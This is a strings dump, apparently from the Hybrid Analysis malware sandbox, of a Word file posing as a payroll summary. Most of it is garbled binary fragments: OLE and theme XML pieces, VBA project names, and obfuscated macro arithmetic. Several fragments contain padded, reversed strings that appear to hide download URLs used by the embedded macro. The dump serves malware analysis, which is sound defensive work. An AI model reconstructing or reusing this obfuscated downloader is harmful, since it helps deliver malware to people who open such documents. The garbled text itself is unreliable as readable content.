Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
3065"`vvXph!R
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
32621@cWBwS73x`IjfaPpS bCoZs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
326AV7KVDXn3907woP @
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
38*1UwrUMpQ4
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
393a31B8@"9393`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
3c2DaSUXB823`* XWpNuEQ1(9aIbUBT6atfCbBAvjqHKYn
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
3LcIZhB3wdEOQ3iPFGn`YsGFvFlDlPGGwBRPlJz=%mKF033ql, -`n ivcJPpOZEWsizGGr[FltKUBOB1273UBoVJBKe24pjUKVu0840 c1izH&S82(MpqpAV0418
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
3QNxHA+FGQiI'Qg7B>AMQwY-'Ym,,t
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
41@2KCrItA69041JX ivPwP6836aLajmWJwHfcWA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4245BS8bPsq* GBIIwE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
43980,klm1'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4429jNjBO8203 * NFaHudStr(9 7948),aQNjqQicmVOPEnd [
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4<MX/OZ2H!cD 7IC9ExC9EMX/OZ2H!cME(S"SS"6"(1Normal.ThisDocument0(%`%(%*`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4aWW000X000X0rU@(`/(A`/(`/$`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4F+8JI$rVLvVxNN";fVYx-,JfV<+k>hP!aLfh:HHX WQXt,:JU{,Z BpB)siE4(=U\.O.+x"aMB[F7x"ytK-zz>F>75eo5C9Z%c7%6M29B"N
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4fiIIsowkw9zu1c1c1c1c$' ' O NXX n DX X' ' S U vXX X X'miYJYs&&!%TjDEXVkGksKp%!4iJh$' ' # % XX A
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5* aLzqLjU263"4AVq6BDvpuMZD`++zPHvPqrDOGFFzX(qqfqsASq0qVzNB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5082~EmbB<80bRzDlZ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
55894"wwEBa`5264@WiSdHL
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
56X* jZGkJC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
570KMqatvUhjlU@qcuLdb.8Z59uesf7P82066?J$_"0wMvJHlpMDPBs@bIRmK(UnUL0uoYTbQ1!81@mFRcGi5660wIbi|XoPRIPjCvXhz!5@vYcMwre84r'bijTVq0jdbboM0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5758fuMlVxiAAu =mjjFqa941AUoABHTe83487q6rZHTparPdJvKphzufIAccjic.vQCVAP(EltvKLpXG34EVrGDVw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5aGOLLwB!3925CvhwPNh0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5CuazX.QB0ljhBFn`9 wpQUbv!3Om0VrmfhhwfOl0aYofqzcWsEp$"WWJRAHC[+1P01][+75C[( eCAlpEr-69]iw.412 L+ A, %50 `itbVQZ OCYaVc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5Q@LbpUXX(363]zllLr@746A]duGXL'39646A]wZNG]azAUd'tMMvPYQ#wQpJm("t.mU9+u.oc.yeladhtiDek//:ptW3mZ", 1`5@)A382+$@wSCNOA$BUjPjfOZzj(SwdQGpHciCkQ66436L HkajsL4306FuTuRKivBe4753MXCkzAR2* mHZwrS!L4467LAmLvnFNmzBL@(HsMznz@$LKiaZZ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5W5WIntb ZAZjtTrjl5F$'$X ' O t XX ) X X''l
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5XcR=%RsCOuwtHJRpYL% 3a$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6 kOfWrnZBf% tes&&r^e=%Sf.W,$'<
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6&&IEGv;FO\4-Sra)RmNAlK[D!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6'gpc_48.gRLB@lr++cxg]u{[+-JG_#G*>
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6071RcMJdmV`880P-irAqs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
64062AdSlPuwhVQvUtF(NTKLZ$XsjLj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
64318$G BOzwJ69832 * TQbLt5Str(@46314)-I`HphHsw KjHBsRvKXfTIFJmBAQQDtHUQmzjftdaLl86085APzIotH=20461PHwXznO70705mGqrEF 49019OfELiUlP80369PuXtbqH1PKlwQvfPRanZswQpJm("Y0BU9nar 6)tQO*+
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
667v2wjCzaJ59490B
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
69OJmsA216171dz iikWriqphw YETmF WTjMH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6`?@nlkfhT"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6u>V<w.>aJWU-uTr7z]iWRE+X{cX_cq?'t3U^VGi!sY7{[og~:_^}6+gmKz~oeE^^X4z'GuM8c?k*}6T*(XB?eMCb(N`((((((((((((q(9?R5q'#aj-&2qwG{rs$_Hn*Dd~^xzOXSTQs}a&8]*AIy~+A R?5oWN+Eo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6XX -M X X'e. "' & ( *o% ,VXX . 0X 2 4X'$oX <': @ B D F;XX Hv J,X L NX'>ta.DuroH@nAttribute VB_Name = "zTZADLcFXJt@FRE"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6ZZJqm4tBBBBB$'L P'N T Vs2 Xz ZeXX \T ^
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7 XXX n> X X'bkR,mU9+mU9/mU9+mU9/:pttmU9+G.3333$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7-A?>iO6~{v5-89F.<G8#5NbpUckE @9E((((((((((((((((((((=x>Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@((((JXip/lg;>116*O+v
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
703UaSdJLATo702vmszBN35296uHjJlo774UIFKXVhJH2fPRtRoqAase5XcR=%RsCOuwtHJRpYL ap47362, %14#@ATM0&= zABlzYiPQL(imSJB wiIYRp 25FLOTbT3&Q
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
71800A$qIjPw27579 * jUtv50555ylBNhc4ioIKzDPiJohHRRRrE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
75075%AwqoZcp7* cbzXEiT%
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
77107$LnzlWW44716 * QzfNYh6Str(@79242)[R0iTzT>NaPLIcEnd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
776#WOSuMpCZTvldhdBs6V TGHTG`Gq jH2LX742`+ pJ$"XtcRfflumHXJ UfPwj@EBwobGHYv,PVp25aKAoA3808
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
785wLvi60`2zMIplv506 CTzwTm!%
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7872#ojjoBw!o8208$WzsjO7673XiPcIAlBslONhiDbVW0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7p$NwjKbA203!BUrcG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7w2m@s^{4}X6pR9$fOK$l%n8'Pk'f>i..yi%`-IQcO0zg!ej
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
8'6 < >| @ BzXX DF F2X H JX':
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
82I LEnrv&#TSRaT!#EoHkS$#5FZ9th}@a[]qwf4j67Mt/'.arBenegnc"fi//wth dpP90uCa!E602342 E$03`BcJNpMMHl08o
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
8558"TcDjJBRV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
875E* IOYTB754bUtclGB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
8918kdiBALS21517B@DWQVMm@83705
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
892DEEhW`ouib
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
8PK!g theme/theme/theme1.xmlY?4}O3d=HTwbS.&!,.1$?"[UR0aF0t~{S^&\t$z=!Q@o?_EG2@>GRU1a$N%KjVkUDRKQj/dR*SxMPsJ5$4vq^WCD{>`3REB=UtQy@\.X7<:+&
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9263AeYwWhNB@Rtsozb(k hWJUo@$FuuQh
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9479bu8dJSbopss8534GQsAkaXp69!loh CC@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
94922bAmup.259Q_EbqGDEJU-906sQ0wfwstKlHo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9672UULYvpbS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9848B9#dBkZ10208 * cVKBZ4Str(43104)WEYJifO= KRRIEZYsnKJYcRBVbvpi(@IRTAFY.k QSjTQ27562PdDcWq>30454APScGoUP483PKVmmiv35230P XnPXYP90150PswEwl0PsNHnOwPqtQDNzPzwjlS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9?6U0X}yU72`t&'dvTsHp&?:D|W>7T>,xV?^>G#|rh[ZxwOVYVEc=kR,&$KE2B(((((((((((((_G_G3?O9*uOF37S/-xGR~gEyXkk=/Op+uAt\H2~EC_7/l?_;o4_"y1?~(lB)H!yd`Yx.^kW\G ?]8yh'72~+JEF401ZlY/}9Q^!G;
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9dTjUFdmk%
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9eJ AfBPV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9KwlUfBUd7478ba0ICmpXNpQT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
:@asjHJXS AZjXP DDaTS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
:KhaljHrPEoYWh/MnzvitlhLDG9aOhEfuUXvcfdjQWaj9aIiljs>OzPiZHJnubQjAzkjGHQTiHAboiDznLl`BQzCwamLbf.kWSoitciPECz>PnGQfPGwkhHqMMwYvHhVsHiwkDEW?hzjsfckzwQuVELARIA0RljnjZdqIuSnXM$jnkMCAxLZSqzr-pZUvwSkGwutoP&GzrzcMvwlBVNVYXYmwFzifntthqwZ9zrpCROFwjjoo]iSCNs5QTncHQ\GJQUO+VHXWtJerzocPOgljSHaW|llfVuRfJGwToHLTWAZXTilvvpWmiC7wdSnWzTYkCHFSQKZ,VTfGrTvKfZXwWKpXwLJ1RahjrcqrLMvQCwMwDtbSaWihNmXancbc*jNfKkB]PVwSdLqMcbtR+MuszVvzYkTokjmSULDEaQww:LjKuvTnKOUv}aiJSOCvbwoazWW8lqnZE#YBMAJ.dRtbEzAVvICCWIMYf~zkJLXUrAYbQJC=WzGdl|sRXULwrABpjq>-OujdzzpuhjaXDAQDXlzcovn/NLRQoDY:DEEhW'kouibFmLHVORhKlBbjB,SmZcwv"LzqMAC*ABEmrNAiEjifo3rWuwUbUVIJwCZnVvrLZsjF^
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
:X < >X'.X B'@ F H8 JA LXX N PYX R TX'D
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
; =d%T,om3h-6JN.Oh-@6F4RPvEJ6( k*Ak*Mm.>PkTICv27Y}2t"!Za@-(SQEQ$R$C\
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>L#@0(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
<i#fKS4(}M:N\W`mR\iX%}Iut0=k>kJ#Tf_dZ/RNXFIVnu Cij(&Kh4nB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
<X X'$ ' 2 %XX =X X' L 8 z
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
= C?hv=%[xp{_P<1H0ORBdJE4b$q_6LR7`0O,En7Lib/SePK!kytheme/theme/themeManager.xmlM
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
=$'~& ' @ * XX Tx X X' ' D iPXX % X X''JmU9+spnZBf%!!%RsCOukicia|a|a|
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
=i3$g3vt(tw8bF62J[=Udazz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
>bOZZse14552AbXkRCR924@* LWzTDhe3@A5af0EwpAbVAmWScwAkELTD@d>w02;)CDSAx34 U91 ,U9H)(p$e9g NDtfi`rtSoTlqsv929734wb, E66$ljGSmk@ tKLaL9jmvUh(DwvJak`suWwvr4258ec rEDNS 644'9KUdmw990$iFRoZb5367 9@zrBsHw$7600BcfUWrrHPEfnA`oCahOAHjokjB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
>tkI.Ox"dWt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
>VYUb;bjbjGG.%d%d+++++????K?WWWWWFFF]]]]]]$<!*+FFFFF++WWZZZF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
?\&$*\Rffff*0<5cd8073f4&"bx"bdh`p"bPfX"bH`dh"bPfXd0"8@bH 0'. 4 6Wt 8% :MXX < >~X @ BX'2lato J'H N Pl RFw T)XX V XX Z \X'Ltu `'^ d fF ho jyFXX lp nY-X p rX'b v't z |y ~ XX G EvX X'xo(X ' .8 0XX +y |X X'58.72 ' R l
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@$y>U1I>+3BF"*)XwvTMNr+m\kaTJzR@E!csI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@1AdKTm.YAB2GjmJwm(64514(aBAYi!(5691BiHzMuAiLLMJC ZiFiT0zufSGR7izc[,)901]raHc[+$5875(EcAlPer-),')7]@943@[eCrtf82p42388b,: F9uwmawHWuTop
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@1cDqEX`00QtmpFLSu52px2izLuOATzGT!RbAHnuicl
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@6u2bjnqC4
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@=s.]xjW5gWH@VUbNpP)gY=W^5cVOGGH*x4FK/ZQDyePdCp=A8M-sw>MEu-+XXomne-%\4`8,>b6h
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@`eVQ<BmuOs(-R8&;O
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@Aq-QEQER sih((ByREPEP$2r}h
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@aUPkBz(YhkAPVUiVu1A6(@YjTvzp68463E(nTVot(83577AWfWli94338(LCdzbME(77145A(ztozYAtA(TmLOA@(N OLVSL@$wzIizt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@dUojswlUfUOaICmpOXNpQTv
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@hzTwZJ!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@N!Y]i-TnRB8zmmwSRtO"i32<`3xSP]"M9;
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@ocHjsC(iiJIQLqEdjX96136A$qpbDn199cqMofSdj@29py3BBZZCr|@* zfvbLFAPt90AAoKuzmqEsQSpi0DvLwDD@sGPRq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@PMDtoM(jDthiT /@ jTCfj26953Fix(lFBKMG))b75181QCLng(WIkWjT91490fqVwN28050 * aUcUVvStr(8709)-BbdHCbGtDhlQ@jjNdYAIjmcSfw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@pmWAVcQlnMCZ+QIUBQj76795
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@tthqwZP(0zrpCwjjo19429UniJsp9AR QTncH72819BGJQU92JVHXWtJ27441rzocPOP@ljSHaW@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@uYuUfZLiVibUjrBjW7383czVhRR9 C3a
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@YzrqFa|aCOYjz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@}w7c(EbCA7K
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
[ m=|ImCUqqV9p>H&QXlXxW\mkW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
[Host Extender Info]
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
[Workspace]
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\>XX ^ `X b dX'T h'f l nEP pO r1XX t{ v9X x zX'jY0BU9nar )mU9+mU9JQOtmU9+mU9JmU9+mU9QO+JQOcemU9+mU9jmU9+mU9bo-wJmU9+mU9QO+JQOemU9+mU9JQO+JQmU9+mU9OmU9+mU9nJQmU9+mU9O(mU9+mU9& = dmU9+mU9smU'+'9+mU9adasnAx1mU9(( '(( ( )'x'+]03[emohS2,UUUU$'| '~ P r<XX fJ /$X X' ' Q '~ oXX MSX X'PzTBfU9+mU9OmU9+mU9tcejbmU9+mU9o-JQO+JmU9+mU9QOwJQO+JQmU9+mU9OenJQmU9+mU9OmU9+m'+'U9(mU9+mU9'+'. =mU9+mU9 UmU9+mU9YYmU9+mU9A'+'mU9+mU9x1'+'mU9+mU9;modmU9+mlOOOO$' ' m t BVXX PX X' ' k 'w |XX QT X X'=eiEmU9h@/4mU9+mU95mU9+mU9AQT/moc.akhcmU9+mU9si/mU9+mU9/:pttmU9+mU9h@/zoamU9+mU9R/ppa-pmU9+mU9pw/k@rnEpQQQ^Q$' ' Z i |QXX L eX X' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\^[A:P=q[pFR#1[#7I=nwU::gQ6kHmF-VUX2yKYw;~@r=co|?PVyG,8ht.o&I#H .|sam%a%m&.u(O"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\Z8WRxY5xkX{o,AqI'J(>}JK|G}$obDp] d`soLuYm\U+qer:>V%rc8m_WOJ}K
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\|'m#W$mx2.2+A=h'QnpZ/?X5lyY8u9tIN4[)f6~dh#Oo:muZIYX{*QG~L{ww$Mq&::XozM'zSC%`amKq&{sqKu-4m ch
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\|'m#W$mx2.2+A=h'QnpZ/?X5lyY8u9tIN4[)f6~dh#Oo:mu{ZIYX{*QGKx[WyD7b61$ulW{H$A8kVSx&_3}Qg,s=O15]f[j,g''}'Z3|;xFS\G6cw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
]ZkDK8I=^{E[\6wygMmqa(?r8Z"xhk,-^C:91',Z+mq{xRkmI=zW0(([$l7g9G!y6|djJ],x&m&Dw.bD(Z9v1.rzs=^yRh'5`I!d
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
^([2+xt=RQZzy=Fog1pP?d^O}3Y7_}s2C#f[-=O+)W^1MEG+xYyi[M*!=W0i&aP*cJ.G\duSq]2
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
^`dhBd dD@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
^smkq<'ldZme5tSG8Pm#|:~^[,ka&&f5{7VR"4[v`v`1-=]Dx#eDj>ND.Y7|Fs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
__SRP_1$__SRP_2
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
_A6NS KV\ItKyV;o?>&&b63/|r'g;E/V}O*o~Kkq?rk|e>K"]=J!gj31+^v_V{WN)tx/-f=*O^#9(.-4L@-@=VVgGmu|*\gr{gSB^UFiG2KzGKZm?[;S/u&iG`2#]U|V<W]*PzzmynC)xRk0P"ld`?z=}^sXoZ!~AWduZY0pv{5QK1I&#m}5]707lSS]05g2LFm9:F$o5f3O0wi",
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
_uiRM.Y<VaW8m>W7./\Vh$5vy"dP,YOw:DZV.b9
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
_VBA_PROJECTFPAOsHRZpzGcVHYQzTZADLcFXJtFRE7PROJECTdV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
`0owVBjAg5643APcwM1257zflwD1A
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
`S0C6Xo}wEq~.j%\XGO1<sS35k$`28[/=s/5%}mcc);PmO@!T3@6v>a lySh/7zouO\&8,u{U[jsawY}[w(n#a
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
`TuLru$(7A$QHSNH90228.McXBL.ZwJE.ZWhhiPzo1wC,6a$JQO8r%Jq=578~9r=p=$6izmmpq( ozAQWvjYsnLVHOEQ3PwUlHL!021725WVdpVdFir- LLBcC`!3437ZQQDYN7954MuTNr57JLXLa DPhzE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
`X X'OB2UMNJ=%VHTUTCEY0Cd.bbbb$'j ' AeXX / +?X X'U9nJ ' P H SXX 5X X'YZ&p=%TjDEXVkGksKp% tps2SAEEEE$' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
`zSjzEaAyZaQWbz30963HBGDOi887-AcjiHJUe94007LfN$BZ33* @RVMaCM%322Xrazs "LRQJoR@AcFariHSO2SQu.EozMFTWzaojzGLMGX275315Aeb, E-A@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
a iDYuFSTqVnDfRGE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
A ZcDditiZDN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
A18215=aiSMGjEVUXjA(lWBNc$TOqzhj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
A5g@uh3>3-;:]*
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
A;L11A; MNkGY;PsztPn(GjhANT$BGLkmj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
AIjza(hWYZq / @HNCjjs18890Fix(zwQqFr)) + 83688 - CLng(nabaH 70764#qvNnq33935 * ZPvSI3Str(55930)XmtpiU<BrsrBiEnd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
aQDWOjHWkzQXuDUL 31391@tludbP850fGRmvrv!F=6121Qoaul+ 550$P! RSmEzg!73pzuaNpauwXrqk!00IIDrcPuRTRQp5+ KpLRiDHzwV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
aRhncErOiq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ASdNzI2jDHwwLrGWEGz)GcVEb}CVifbfVlmofGfwOUYSpicKzZlinNYbUVaEQucdi_LnzaGpjKIHIk#fPWlDbaoRwjPRviofrDKZfYUO\XEGEptiYBGPzSdaZDiOidtfXaEUrpOkhrC8MYDHMoGabIXrVPdkoGizFUJ5zjsuLaWhwzwwkbBwQfYICzIrdNSiR6OjQiqc=ZQill%jRccsbGTKaVbuYuUfZ_LiVibUjrjfczVhRR"SMSOkZbczkrRXjAWYXioqGzC1DNaWtfwLFvsQv+CTrhtAPkuuNfLHzQvJcDcoatdbQwXBiQLQJpzzktcvOmRzu^OtzOQa?WdTavvHFwHEd+hwEqq`bBVijU4hzTwZJTNcwWz}jQLBQ*LAkvMQzfwwNtl]?TMGTPWQjZGkJC';RiaPhRYkIKrPaRCSNHdBJEUJ7roKiiZAVFjipiiiSpwvbzTJFwhPC]NvwfHv/aINCfcV*zXalwTMNZGSc@GCQojxdCktSzZirLZfNGVWiKkqFwhfOtDwPjANobjnqCCwjCzapeoJYvGqiYPqOaiMqatuJvUhjlU2qcuLOz,wMvJHl$rMDPsVbIRmM1UnULXuoYTboJmFRcGiPlwIbiXoCvXhzvgYcMwrJbijTVqXjdbboMLuckpqswVbNwMzWmjtWnQZinT}itkaRpjHuvwfTcDjJRSbPsYqGBIIw@sJXuiQPJlwQdCwgUWifdl\bDbQjNX?qZzID*otoXt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
AtIcz(oGJSa / oqVZwB 77713Fix(mrEzEp)) + 5351 - CLng(Juafw 74079"WZNw14261D *RWkR3Str(73044)WIbBwLj=oIYJU wOsvwWzAlE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
AUHSGj(XjPVbqpa49J
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
aVJlBH=RSDLAu lUWWW@#55496=BGz$EF=17=GDiaLQ=0=@zfRIRO58867=pswSvF>9044=TvELU@= FjLQLmXFSlm jAhYO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
AVvICC3WIMY1O8zkJLXU`,6BOAYbQJCWzGdlsRXULw! ABpjOujd(zpuhn/ XDAQD@66571& zcovn"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
aYofqzcWsEvitbVQZxOCYaVc`,zWzzY3rIFHkVhDkVrpCpwL^wkwRRD{zLBjpcA_%TlfEvLW?jSYZvwnCKuX_kdwFL>HTRkCJzPSzwM#FCTUlVzRqbcEmKNpFOLLwBPvhwPNhUqrJBbEGccIlGlLoI<wCffbzNmTjcr`tfpdnc%tzNssnluvmr>JYpiC:VhWIjwPuPcoAJtsSAF9=XwlYmUvCbtaLLqUEMhHnrJuvDJFuPoiZunk[ucGjYksAAuvy[dOqqEZ+FIVXbcWKVDXnKnwoPbKQIOYTBwUtclG`4IwYfhfWwdBSwUXIWIorSowksPPMDtoMF:jDthiTjTCfjlFBKMGb&WIkWjTfqVwNTaUcUVvBbdHC~bGtDhljjNdYA`jmcSfwYzanJ-quaRiCdZitb%GpGVcXkn[NhHwRw7UXuHEzwvWfUtjqbEjizPYUPFcUuaIu\hsJjlWy\OGwUzuNzYhBFmGwQWRfjaf-AEQmLk:sAlWcKFPNTMutMYEASlPuwh6VQvUtFcNTKLZaXsjLjIoqijINDDfjNjKAoOCj0bvPcwBdKTmYzz<GjmJwmwaBAYiiHzMuTLLLMJCZiFiTzufS&uwmawHWuTopJBvBLamzjpfZIfAUbzPLLiOac(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
a|$'mU9+mU ' l LXX w X X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
a|r_HBApXn9M=deW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
B ' J'H N P RC TFFXX V XX Z \X'L `'^ d f h* j%XX l'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
B,$"B+B'FPAOsHRZ@pzGcVH'FDP@'Os@RA@*pzG@*V?'K
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
b?QXAhiRvCwZNlB@hCkjjj JcqYwTHJM0FrRV`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
bac(.:n.QtoV7U~udgih={_J?Or\fo1pw8=%+JM$K5pImyD{M,nVA _[@}UE7Ihy%
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Bas1Normal.ThisDocument
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
BbKMcdWaKwQpJm("JrwHsum%KGj", 34\5QAGtXKXzCzAOuv
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
